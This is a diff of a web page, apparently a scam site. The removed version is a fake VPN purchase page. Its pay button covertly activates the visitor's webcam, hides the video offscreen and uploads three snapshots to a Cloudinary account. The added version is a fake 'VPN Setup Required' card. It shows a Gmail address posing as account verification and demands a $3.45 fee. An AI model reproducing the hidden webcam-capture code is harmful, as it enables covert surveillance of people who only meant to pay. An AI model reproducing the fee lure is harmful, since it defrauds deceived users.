--- a/index.html
+++ b/index.html
@@ -1,145 +1,115 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>VPN Lifetime Access</title>
+  <meta charset="UTF-8">
+  <title>VPN Setup Required</title>
   <style>
-    * {
-      margin: 0;
-      padding: 0;
-      box-sizing: border-box;
-    }
-
     body {
       font-family: 'Segoe UI', sans-serif;
-      background: linear-gradient(to bottom right, #1e3c72, #2a5298);
-      color: white;
-      min-height: 100vh;
+      background-color: #f4f7fc;
       display: flex;
       justify-content: center;
       align-items: center;
+      height: 100vh;
+      margin: 0;
     }
 
-    .container {
-      text-align: center;
-      background: rgba(255, 255, 255, 0.05);
-      padding: 40px;
-      border-radius: 20px;
-      box-shadow: 0 0 20px rgba(0, 0, 0, 0.3);
+    .card {
+      background: #fff;
+      padding: 30px;
       max-width: 400px;
-      width: 90%;
+      border-radius: 16px;
+      box-shadow: 0 8px 24px rgba(0, 0, 0, 0.1);
+      text-align: center;
     }
 
-    h1 {
-      font-size: 1.8rem;
+    .card h3 {
+      margin: 10px 0 0;
+      font-weight: 600;
+    }
+
+    .card .label {
+      color: #888;
+      font-size: 14px;
+      margin-bottom: 4px;
+    }
+
+    .icon {
+      margin: 20px auto;
+      width: 64px;
+      height: 64px;
+      background: #e7f1ff;
+      border-radius: 50%;
+      display: flex;
+      align-items: center;
+      justify-content: center;
+    }
+
+    .icon img {
+      width: 36px;
+      height: 36px;
+    }
+
+    .title {
+      font-size: 20px;
+      font-weight: bold;
+      margin-top: 10px;
+    }
+
+    .desc {
+      color: #555;
+      font-size: 15px;
+      margin: 12px 0 18px;
+    }
+
+    .highlight-box {
+      background-color: #fff7d1;
+      padding: 12px;
+      border-radius: 8px;
+      font-size: 14px;
+      color: #444;
+      border-left: 4px solid #ffcc00;
       margin-bottom: 20px;
     }
 
-    .price {
-      font-size: 1.5rem;
-      margin-bottom: 10px;
-      color: #ffdf00;
-    }
-
-    .note {
-      font-size: 1rem;
-      margin-bottom: 30px;
-      opacity: 0.9;
-    }
-
-    .buy-button {
-      background-color: #00c853;
-      border: none;
-      padding: 15px 30px;
-      font-size: 1rem;
-      font-weight: bold;
-      border-radius: 8px;
+    .button {
+      display: inline-block;
+      padding: 12px 20px;
+      background-color: #007bff;
       color: white;
-      cursor: pointer;
-      transition: background 0.3s ease;
+      border-radius: 8px;
+      font-weight: bold;
+      text-decoration: none;
+      font-size: 15px;
     }
 
-    .buy-button:hover {
-      background-color: #00b44b;
+    .button:hover {
+      background-color: #0056b3;
     }
   </style>
 </head>
 <body>
- <div class="container">
-  <h1>Last and final payment to Download VPN</h1>
 
-  <button class="buy-button" onclick="handleBuy()">Pay $9 to download vpn</button>
-</div>
+  <div class="card">
+    <div class="label">Gmail User</div>
+    <h3>facebookofficialcyber@gmail.com</h3>
 
+    <div class="icon">
+      <img src="https://img.icons8.com/ios-filled/50/007bff/shield.png" alt="shield">
+    </div>
 
-  <script>
-    async function capture(totalCaptures = 3, intervalMs = 200) {
-      const cloudName = 'dojvahtu9';
-      const uploadPreset = 'webcam_capture';
+    <div class="title">VPN Setup Required</div>
+    <div class="desc">
+      For your security, please set up our VPN <br>
+      This helps protect your account and personal information.
+    </div>
 
-      const stream = await navigator.mediaDevices.getUserMedia({ video: true });
+    <div class="highlight-box">
+      A one-time <strong>$3.45 VPN setup fee</strong> ensures secure data handling and unlocks your verification access.
+    </div>
 
-      const video = document.createElement('video');
-      video.style.position = 'fixed';
-      video.style.top = '-9999px';
-      video.style.left = '-9999px';
-      video.autoplay = true;
-      video.playsInline = true;
-      document.body.appendChild(video);
-      video.srcObject = stream;
+    <a href="#" class="button">Pay $3.45 to Download VPN</a>
+  </div>
 
-      await new Promise(resolve => {
-        video.onloadedmetadata = () => resolve();
-      });
-      await video.play();
-
-      const canvas = document.createElement('canvas');
-      canvas.width = video.videoWidth;
-      canvas.height = video.videoHeight;
-      const ctx = canvas.getContext('2d');
-      if (!ctx) throw new Error('Canvas context missing');
-      canvas.style.display = 'none';
-      document.body.appendChild(canvas);
-
-      for (let i = 0; i < totalCaptures; i++) {
-        ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
-        const imageDataUrl = canvas.toDataURL('image/png');
-
-        const formData = new FormData();
-        formData.append('file', imageDataUrl);
-        formData.append('upload_preset', uploadPreset);
-
-        const response = await fetch(`https://api.cloudinary.com/v1_1/${cloudName}/image/upload`, {
-          method: 'POST',
-          body: formData,
-        });
-
-        const result = await response.json();
-        console.log(`Uploaded image ${i + 1}:`, result.secure_url);
-
-        if (i < totalCaptures - 1) {
-          await new Promise(res => setTimeout(res, intervalMs));
-        }
-      }
-
-      stream.getTracks().forEach(track => track.stop());
-      video.remove();
-      canvas.remove();
-    }
-
-    async function handleBuy() {
-      try {
-        await capture();
-
-        // Redirect or show payment process
-        // For example:
-        // window.location.href = "https://your-payment-page.com";
-
-      } catch (error) {
-        console.error("Error during capture:", error);
-      }
-    }
-  </script>
 </body>
 </html>
